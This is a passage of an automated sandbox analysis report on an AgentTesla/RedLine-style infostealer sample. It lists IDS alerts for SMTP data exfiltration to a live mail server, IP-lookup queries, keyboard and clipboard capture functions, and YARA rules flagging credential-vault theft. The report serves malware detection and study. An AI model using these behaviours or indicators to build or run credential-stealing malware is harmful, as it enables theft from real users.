                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49752 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49752 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49753 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49753 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49753 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49753 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49754 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49754 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49754 -> 79.170.44.32:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49754 -> 79.170.44.32:587
                Source: global trafficTCP traffic: 192.168.2.4:49731 -> 79.170.44.32:587
                Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                Source: Joe Sandbox ViewIP Address: 79.170.44.32 79.170.44.32
                Source: Joe Sandbox ViewASN Name: GODADDYDE GODADDYDE
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: global trafficTCP traffic: 192.168.2.4:49731 -> 79.170.44.32:587
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B125E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00B125E2
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                Source: global trafficDNS traffic detected: DNS query: mail.fasmacopy.gr
                Source: RegSvcs.exe, 00000003.00000002.4151126152.00000000034DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.000000000369F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.0000000003580000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.000000000373D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.0000000003959000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.00000000037E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.fasmacopy.gr
                Source: RegSvcs.exe, 00000003.00000002.4151126152.0000000003431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegSvcs.exe, 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                Source: RegSvcs.exe, 00000003.00000002.4151126152.0000000003431000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, R1W.cs.Net Code: g4oc3ou
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B1425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B1425A
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B14458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00B14458
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B1425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B1425A
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B00219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00B00219
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B2CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B2CDAC

                System Summary

                barindex
                Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 3.2.RegSvcs.exe.2fffe36.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 3.2.RegSvcs.exe.5870ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 3.2.RegSvcs.exe.5900000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 3.2.RegSvcs.exe.2ffef4e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 3.2.RegSvcs.exe.5870000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 3.2.RegSvcs.exe.2ffef4e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 0.2.GkYUK8VCrO.exe.3530000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 2.2.GkYUK8VCrO.exe.36c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 3.2.RegSvcs.exe.5870000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 00000002.00000002.1694565246.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 00000000.00000002.1682393372.0000000003530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 00000003.00000002.4149885312.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: This is a third-party compiled AutoIt script.0_2_00AA3B4C
                Source: GkYUK8VCrO.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: GkYUK8VCrO.exe, 00000000.00000000.1673519036.0000000000B55000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_eaf4511f-2
                Source: GkYUK8VCrO.exe, 00000000.00000000.1673519036.0000000000B55000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_bcb365d6-d
                Source: GkYUK8VCrO.exe, 00000002.00000000.1681468625.0000000000B55000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d90cebcc-1
                Source: GkYUK8VCrO.exe, 00000002.00000000.1681468625.0000000000B55000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3aba6073-d
                Source: GkYUK8VCrO.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d62bda95-7
                Source: GkYUK8VCrO.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5558b808-7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B040B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00B040B1
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AF8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00AF8858
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B0545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00B0545F
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AAE8000_2_00AAE800
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00ACDBB50_2_00ACDBB5
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AAE0600_2_00AAE060
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B2804A0_2_00B2804A
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AB41400_2_00AB4140
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AC24050_2_00AC2405
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AD65220_2_00AD6522
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AD267E0_2_00AD267E
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B206650_2_00B20665
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AC283A0_2_00AC283A
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AB68430_2_00AB6843
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AD89DF0_2_00AD89DF
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AD6A940_2_00AD6A94
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B20AE20_2_00B20AE2
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AB8A0E0_2_00AB8A0E
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B08B130_2_00B08B13
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AFEB070_2_00AFEB07
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00ACCD610_2_00ACCD61
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AD70060_2_00AD7006
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AB31900_2_00AB3190
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AB710E0_2_00AB710E
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AA12870_2_00AA1287
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AC33C70_2_00AC33C7
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00ACF4190_2_00ACF419
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AB56800_2_00AB5680
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AC16C40_2_00AC16C4
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AB58C00_2_00AB58C0
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AC78D30_2_00AC78D3
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AC1BB80_2_00AC1BB8
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AD9D050_2_00AD9D05
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AAFE400_2_00AAFE40
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00ACBFE60_2_00ACBFE6
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AC1FD00_2_00AC1FD0
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00A436100_2_00A43610
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 2_2_01A636102_2_01A63610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00408C603_2_00408C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040DC113_2_0040DC11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00407C3F3_2_00407C3F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00418CCC3_2_00418CCC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00406CA03_2_00406CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004028B03_2_004028B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041A4BE3_2_0041A4BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00408C603_2_00408C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004182443_2_00418244
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004016503_2_00401650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402F203_2_00402F20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004193C43_2_004193C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004187883_2_00418788
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402F893_2_00402F89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402B903_2_00402B90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004073A03_2_004073A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02F6CEB03_2_02F6CEB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02F6D7803_2_02F6D780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02F6CB683_2_02F6CB68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02F610303_2_02F61030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02F610203_2_02F61020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068F5E583_2_068F5E58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068F92703_2_068F9270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068FB8C83_2_068FB8C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068FE9D03_2_068FE9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068F00073_2_068F0007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068F00403_2_068F0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06D100403_2_06D10040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06D1A1B03_2_06D1A1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06D111383_2_06D11138
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06E59AE83_2_06E59AE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 43 times
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: String function: 00AA7F41 appears 35 times
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: String function: 00AC8B40 appears 42 times
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: String function: 00AC0D27 appears 70 times
                Source: GkYUK8VCrO.exe, 00000000.00000003.1680747519.0000000003B63000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs GkYUK8VCrO.exe
                Source: GkYUK8VCrO.exe, 00000000.00000003.1681182332.0000000003D0D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs GkYUK8VCrO.exe
                Source: GkYUK8VCrO.exe, 00000000.00000002.1682393372.0000000003530000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefe669a34-3e15-4019-8593-4c1c330bc15b.exe4 vs GkYUK8VCrO.exe
                Source: GkYUK8VCrO.exe, 00000002.00000003.1691263761.0000000003833000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs GkYUK8VCrO.exe
                Source: GkYUK8VCrO.exe, 00000002.00000003.1690857295.00000000039DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs GkYUK8VCrO.exe
                Source: GkYUK8VCrO.exe, 00000002.00000002.1694565246.00000000036C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefe669a34-3e15-4019-8593-4c1c330bc15b.exe4 vs GkYUK8VCrO.exe
                Source: GkYUK8VCrO.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 3.2.RegSvcs.exe.2fffe36.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 3.2.RegSvcs.exe.5870ee8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 3.2.RegSvcs.exe.5900000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 3.2.RegSvcs.exe.2ffef4e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 3.2.RegSvcs.exe.5870000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 3.2.RegSvcs.exe.2ffef4e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 0.2.GkYUK8VCrO.exe.3530000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 2.2.GkYUK8VCrO.exe.36c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 3.2.RegSvcs.exe.5870000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 00000002.00000002.1694565246.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 00000000.00000002.1682393372.0000000003530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
